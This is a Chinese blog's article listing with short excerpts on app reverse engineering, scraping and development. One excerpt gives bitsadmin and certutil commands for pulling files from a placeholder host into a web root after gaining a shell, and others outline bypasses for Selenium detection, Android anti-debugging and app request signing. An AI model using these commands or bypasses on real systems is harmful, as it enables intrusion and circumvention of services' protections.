- 博客(58)
- 收藏
- 关注
RSS订阅
原创 2022 nike ibox wtoken 成品_genericNt2 _genericNt1 _genericNt3 com/aliyun/TigerTally/TigerTallyAPI
ibox wtoken _genericNt TigerTallyAPI
2022-05-10 15:57:56
17601
9
原创 windows系统getshell后上传文件
bitsadmin /transfer myDownloadJob /download /priority normal https://xxx.com/temp.zip C:\xxx\wwwroot\xxx\xxx\inst\temp\temp.zipcertutil -urlcache -split -f https://xxx.com/html.zip C:\xxx\wwwroot\xxx\xxx\xxx\acticle\temp.ziptar -xf C:\xxx\wwwroot\xxx\xxx\i
2024-05-29 11:08:48
262
原创 protobuf 黑盒调用 blackboxprotobuf 不用proto文件 application/x-protobuf 超短保姆级教程
看了网上很多教程使用blackboxprotobuf,有一个小坑,在复制protobuf到代码里面的时候,应该转成hex或者base64,在代码里面转码,这样才能出数据。
2022-09-22 15:07:35
3560
2
原创 该虚拟机的某个磁盘已经由虚拟机或者快照使用 vmware 损坏 .vmdk为空
如果是vmdk,以前有快照的话,恭喜你秒解决.找到000002.vmdk结尾的,打开,复制到对应的,里面的数字改为损坏的数字。例如5损坏了,把2改成5,就可以用旧快照救新快照,这解决方法自己试出来的,搜遍全网没人告诉我T.T。以下每一步操作完之后都可以,试试成功没.删除不要+shift,删错了还能垃圾桶找回来。这问题出现的原因就是中途断电了,没其他可能了.现在csdn到处都是软文,我这种却发不出去…删除类型为快照的.vmsn/.vmsd文件。删除虚拟机配置文件下面的.lck文件。
2022-09-04 23:01:43
2971
4
原创 邮政app js瑞数5代低能版 ImyafEkG D2ko1bQr sekiro例子 webview调试
这个瑞数五代被写死了,没有用到随机cookie和随机代码和随机变量,我简称弱智版瑞数这个web需要用微信浏览器授权来获取userid,所以不能在谷歌调试
2022-01-14 11:49:01
4761
原创 安卓 反调试 环境检测点汇总 hook( 面具 xp ida frida )检测点 和 绕过策略
属于到处收集的资料和工作中碰到的,在此感谢文末出处链接的作者我把他们分为三大部分,由浅至深,实际上检测点实在太多了,肯定不全的,如果有漏掉的麻烦大佬在评论区指出Java在java层检测的实际很容易就能找到,因为app反调试的反映只有几种闪退弹窗卡启动页实际上甚至可以无视上面几种,无脑hook所有函数,再过滤掉启动必须的函数就能找到1.应用主动申请root权限来源: https://www.cnblogs.com/android-er/p/5478298.html主要是这一条命令.
2022-01-06 23:07:05
10986
原创 selenium所有检测点和绕过方式[运行命令后被检测/打开就被检测/环境检测]
网上说的基本不全,最近有个新加密(F5shape)是控制流加密,解起来比较繁琐,就直接用selenium了,我看到有环境监测,但是没想到有检测selenium…一开始用nodejs写的,但是用nodejs写面向过程的代码真的很难受,又改为python了打开这个网站就能看到部分检测点 https://bot.sannysoft.com基本配置UA手机版本的话要设置通用手机型号根据这个网页好好配置下https://peter.sh/experiments/chromium-command-lin.
2021-12-22 15:25:10
17454
2
原创 js vue hex2string
hex_to_ascii(str1) { var hex = str1.toString(); var str = ""; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } return str; },
2021-10-21 14:47:09
817
原创 dbused StartMiner最新变种 cpu爆满 挖矿病毒 redis漏洞手动查杀流程
上图是特征如果是生产服务器建议还是直接重新装一台快一点这个病毒很恶心,到处都有他的定时器,到处都有他的执行指令.好在他自己的名字是固定的,不然真的很难定位ps -aux
2021-09-02 21:09:55
1494
2
原创 某宝 小黑屋 x-sg?xt x-si?n x-m?ni-w?a 分析学习
这个样本没有加壳,直接拖到jadx就能看到代码,但是核心代码部分会加载错误,这个时候需要用配置打开jadx-gui --show-bad-code taobao.apk…就能加载到了
2021-08-12 15:26:24
3630
原创 AST学习笔记 至少入个大门
我的理解:AST相当于把js代码所有语法解析为抽象的树.用处大概就是逆向的时候把混淆的代码还原逻辑,方便看逻辑.一. 直观地看ASTAST在线解析用这个网站输入JS源码就可以看到AST解析出来的语法树了type节点类型start,end节点起始.结尾位置program源代码comments注释具体还是输入代码到网站上看对应的类型,这样比较快速学习二.代码框架来源:悦来客栈的老板的星球//babel库及文件模块导入const fs = require('fs');//ba.
2021-07-23 16:15:40
1907
原创 nginx用upstream做负载均衡 服务端用session的 session一致性的所有解决方案
session跟cookie不一样,session是存放在服务端,在多服务器的环境下,用的session需要分配在同一个服务器才能正常识别,而,nginx的upstream用来做负载均衡很方便的,最后那个方案是最方便的,懒得看的可以直接拉到最后方案一:redis做中间件存储session信息这个方案对需要频繁对session进行读写的服务里面实际是不太友好的,因为不论redis是放在哪里,内网还是外网,多服务的环境下还是需要频繁的网络请求,这里面的时间差积沙成塔,性价比是很低的方案二:ip_has.
2021-05-30 15:21:29
596
原创 nginx http超长body响应报错解决方案
首先nginx添加以下配置types_hash_max_size 2048;client_max_body_size 10M;fastcgi_buffer_size 128k;fastcgi_buffers 32 32k;lua_shared_dict cache 1024M;根据实际情况调整参数网上都是以上的配置就完了,实际没有效果,通过查看nginx日志可以得知,是缓存目录并没有写入权限/usr/local/openresty/nginx/proxy_temp到缓存目录输入.
2021-05-27 19:07:07
1210
原创 F12 JS分析的时候的无限debug快捷解决方法
方法1:console输入Function.prototype.constructor = function(){}后面加
2021-03-16 13:32:20
1483
1
原创 m3u8安全性探讨 加密解密 解决与实现方案
目录对m3u8的一些见解简单防护改文件后缀key文件限制m3u8鉴权主流解析引擎-ffmpeg魔改加密ts鉴权主流框架exoijk区别对m3u8的一些见解m3u8作为目前在线视频的主流,被各大小厂商用到,但是大家有没有发现,m3u8自带的aes-128加密的存在好像可有可无,因为key的url链接没有做防御,只要对链接的抓包即可下载或者盗播,完全没有安全性.简单防护在m3u8文件中有很多#开头的解析符号,都是在解析m3u8的时候进行设定常量或者加密的key,iv,或者时长.ffmpeg中有一个小
2021-03-14 14:57:33
14609
1
原创 git clone还是很慢
1.git需要设置代理才能使用代理bash运行git config --global http.https://github.com.proxy socks5://127.0.0.1:1080git config --global https.https://github.com.proxy socks5://127.0.0.1:10802.改host文件github.com 跳到 github.com.cnpmjs.org3.改国内镜像站...
2021-02-20 18:16:36
150
原创 Intellij IDEA远程debug极其详细教程从0到1
tomcat部署到服务器上的时候不方便查找报错的地方,但是可以通过远程调试直接在idea上debugidea界面中,选择顶部菜单栏选择Run-> Edit Configurations点击+号->Remote->输入Host,修改Port(默认也可以)2. 需要被远程的tomcat,找到bin文件夹.此处需要注意区分是linux还是windows,运行的是sh和bat修改相对应的catalina.sh/catalina.bat插入代码catalina.bat.
2021-01-08 21:01:34
241
原创 linux服务器安全配置流程 不装安全软件 纯手工配置
实际服务器是可以有自己的安全性能的.装防御安全软件还不如配置的好防pingecho "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all很多软件扫服务器首先是从ping开始,防止ping可以有效防止别人从互联网中扫到的服务器待续.....
2020-12-02 14:43:34
170
2
原创 fiddler 全局替换返回字段规则 三行代码
效果fiddler界面 ctrl+rctrl+f 搜索static function OnBeforeResponse static function OnBeforeResponse(oSession: Session) { if(oSession.utilFindInResponse("百度", false)>-1){ oSession.utilReplaceRegexInResponse("百度", "必应"); } }以下这段可以做是否启动替换的判断到
2020-11-15 11:54:31
420
原创 unidbg快速入门使用 so直接调用 ndk调试 unidbg实在太强大太方便辣
现在很多app都把核心加密放到了so层,如果是Java层主动调用ndk的形式运行的话,用unidbg直接调用会很方便unidbg github地址 https://github.com/zhkl0228/unidbg下载好后,用idea打开(需要预先配置好maven,这里不多说),最好上个机场,下载配置会快一点全部搞定之后,到这个路径(C:\Users\Administrator\Desktop\unidbg-master\unidbg-android\src\test\java\com\byt.
2020-11-04 11:05:54
6057
12
原创 objection 改源码解决 app的双进程保护 和 双进程保护原理 frida.core.RPCException: Error: expected a pointer
采用双进程的方式,对父进程进行保护,基于信号的发送和接收,实现相互的保护防止被动态攻击。简单的双进程保护就是从原进程再fork一个空进程出来,让逆向分析的时候附加到空进程中导致hook不上双进程进程保护主要功能: 1、保护父进程,ptrace所有线程,防止被附加、调试、暂停; 2、保护子进程,防止被暂停、异常退出;下面是我用objection附加双进程保护的app的时候报错,一般双进程保护,先把app关掉直接用spwan模式就能附加上root@arr:~/Desktop/frida_js# ob.
2020-10-30 23:31:09
6386
7
原创 Fart脱壳的Dex fart加载不出来 用010Editor修复抹头Dex 修复Dex文件头
fart主动调用脱壳之后,有些重要的dex会被加固厂商抹头,修复方法很简单.需准备010EditorJadx抹头dex导入之后是没有方法体的导入010Editor之后是这样的实际前面6位都是00 这很简单 随便导入一个正常的dex 把正确的头部替换掉就可以了正确头部 64 65 78 0A 30 33 35替换掉 00 再重新导入010editor就能成功解析重新导入jadx就能看到方法体了...
2020-10-20 17:37:44
1625
原创 Spring异步失效的原因总结 @Async @EnableAsync
1.没有@EnableAsync可以放在启动类也可以放在局部类2.@Anync注解的方法跟调用的方法在同一个类中创建一个异步类,把异步方法写在异步类再调用3.Funture<>堵塞去掉试试看4.看看是不是真的失效了啊...
2020-08-31 18:12:44
1064
原创 RSA对称加密 Util工具类
证书Key直接去换行符存放到就可以更方便,如果需要做安全的话可以把字段放到so层比较好public class RSAUtil { public static final String KEY_ALGORITHM = "RSA"; public static final String SIGNATURE_ALGORITHM = "MD5withRSA"; private static final int KEY_SIZE = 1024; private static f.
2020-07-30 13:56:02
1033
原创 desede加密 cbc模式 加密解密工具类 java
desede加密是des的一个加强版 所以实际跟des同key同iv的结果是不一样的 线上没有相关资料我就发一下import org.apache.tomcat.util.codec.binary.Base64;import javax.crypto.Cipher;import javax.crypto.KeyGenerator;import javax.crypto.SecretKey;import javax.crypto.spec.IvParameterSpec;import ja.
2020-07-29 14:37:41
1192
原创 Flutter/dart hex算法 加密 解密 编码 解码 String to hex
就很单纯的hex算法,但是我查过很多资料都是hex转color什么的这个是hex和string的互转class Hex{ /// Creates a `Uint8List` by a hex string. static Uint8List createUint8ListFromHexString(String hex) { if (hex == null) throw new ArgumentError("hex is null"); var result = new U.
2020-05-28 16:27:45
3478
4
原创 深度学习 cnn pytorch框架报错 size mismatch, m1: [ x ], m2: [ x ] Captcha.ImageCaptcha设置生成图片的大小尺寸
看总结直接拉最后这里很大程度是因为图片大小不一致,可以通过 resize命令来进行图片的归一化.如果是通过captcha库里面的ImageCaptcha生成的验证码,百度上 没有任何资料说可以改变图片大小作为训练的.但是直接看他的代码得知,他是可以设置图片长宽和大小的class ImageCaptcha(_Captcha): """Create an image CAPTCHA....
2020-05-01 15:27:10
2225
1
原创 JPA Hibernate @Query 参数可空不为null时再插入 的方法 比较方便的分页方法
目录@Query 参数可空分页方法@Query 参数可空例如我需要 id 这个字段可以为空SELECT * FROM mysql WHRER if(?1!="",id = ?1,1=1);if(?1!="",id = ?1,1=1) 主要就是这句话,id是列名, ?1是第一个变量分页方法分页需要 page和size两个变量,分别为页数和大小我们传递的时候可以直接先算好,?1 为 p...
2020-04-24 23:33:39
1477
原创 vue 动态面包屑 通过面包屑带参数跨级跳转 面包屑动态标题 多级路由嵌套设置默认页面和隐藏左侧导航栏显示
多级路由嵌套设置默认页面 只需要把默认的子路由的path项设定为空 面包屑后面补
2020-04-22 10:47:22
8950
2
原创 Api接口加密解密策略 编写爬虫遇到http接口加密 每个接口的参数和返回内容全都是乱码 最后赌怪附体一发入魂
操作流程用fiddler抓包下载app抓包前端分析js分析chrome断点调试背景:需要编写一个爬虫爬取网站的资料,框架写好了,发现该网站所有api都进行了加密.用fiddler抓包网页端api如下图所示:这里可以观察到,这确实就是网站的api.而且返回的都是一大串莫名其妙的东西,随后多抓了几个包,可以发现共同点.不同的api返回的前面部分都是一样的,这样其实已经可以假想这是一个js...
2020-04-20 00:22:58
2715
原创 Ambiguous mapping found. Cannot map 'Controller' bean method”解决方法
解决方法Controller层找出@RequestMapping里面重复的标签改成不重复即可
2020-04-15 12:00:14
411
原创 SpringBoot用一个注解解决跨域 各种Vue跨域的解决方法
@CrossOrigin放在Controller层就行使用场景要求jdk1.8+Spring4.2+
2020-04-11 14:19:30
318
原创 [coding-企业版的Git]如何使用Git把本地代码上传/下载代码克隆到本地/Git的基础指令
Git上传下载与基础指令Git工具安装Git帐号的准备Git的基础命令初始化命令配置增加/删除文件代码提交分支标签查看信息远程同步撤销Git的上传与下载在线上新建项目克隆线上项目到本地更新本地项目到线上本文的git是企业版的Git,Coding,跟github可能有些许不同.但是大同小异了.Git工具安装Git工具点击链接后找到download字样一直根据提示操作就可以了.下载完成后在桌...
2020-04-07 00:02:25
1030
原创 万能正则公式 获取两个字符串之间的字符串 适应大多数场景
万能正则公式 获取两个字符串之间的字符串如需详细的正则教程,建议直接翻文档表达式(.*?)扩展一下本表达式适用的场景是比较小的爬虫,需要快速编写测试的时候用的,速度肯定会比常规经过优化的正则表达式慢.如果对解析速度有要求的话,建议使用Jsoup对html进行解析或者写常规的正则语句进行解析.如需详细的正则教程,建议直接翻文档菜鸟教程-正则表达式**表达式(.*?)括号的意思就是要...
2020-04-04 16:52:59
549
原创 Jsoup报错:org.jsoup.UnsupportedMimeTypeException: Unhandled content type. jsoup.helper.HttpConnection
org.jsoup.UnsupportedMimeTypeException: Unhandled content type. Must be text/*, application/xml, or application/xhtml+xml. Mimetype=application/json;charset=UTF-8, URL= at org.jsoup.helper.HttpConnec...
2020-04-04 16:10:39
761
原创 使用Jsoup库编写Java爬虫 Java爬虫库的快速学习入门编写
使用Jsoup库编写java爬虫Jsoup库能干什么?Java类似的网络请求库Jsoup库的常用命令getpostbody/toStringexecuteignoreContentTypetimeoutcookiesJsoup库能干什么?从URL,文件或字符串中刮取并解析HTML查找和提取数据,使用DOM遍历或CSS选择器操纵HTML元素,属性和文本根据安全的白名单清理用户提交的内容,...
2020-04-04 16:09:52
616
原创 [Java爬虫和接口] 需要知道的Json解析和区分Json解析库的JSONArray/JSONObject
爬虫和接口编写都需要知道的json解析JSON是什么阿里json处理库引入使用JSONObject特点解析JSONArray特点解析JSON是什么JSON实际上就是一个数据的格式(英文全称是:JavaScript Object Notation;中文全称:js对象标记法)通俗易懂地说,就是将有层次的东西转化成String或者对象,更容易给人看/给机器看,一目了然.一般碰到json我都会...
2020-04-04 15:03:23
458
原创 idea导入maven项目后一堆错误 maven Unable to import maven project:See logs for detail
maven 版本比idea高需要将maven降级到比idea低的版本
2020-03-27 16:24:21
308
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人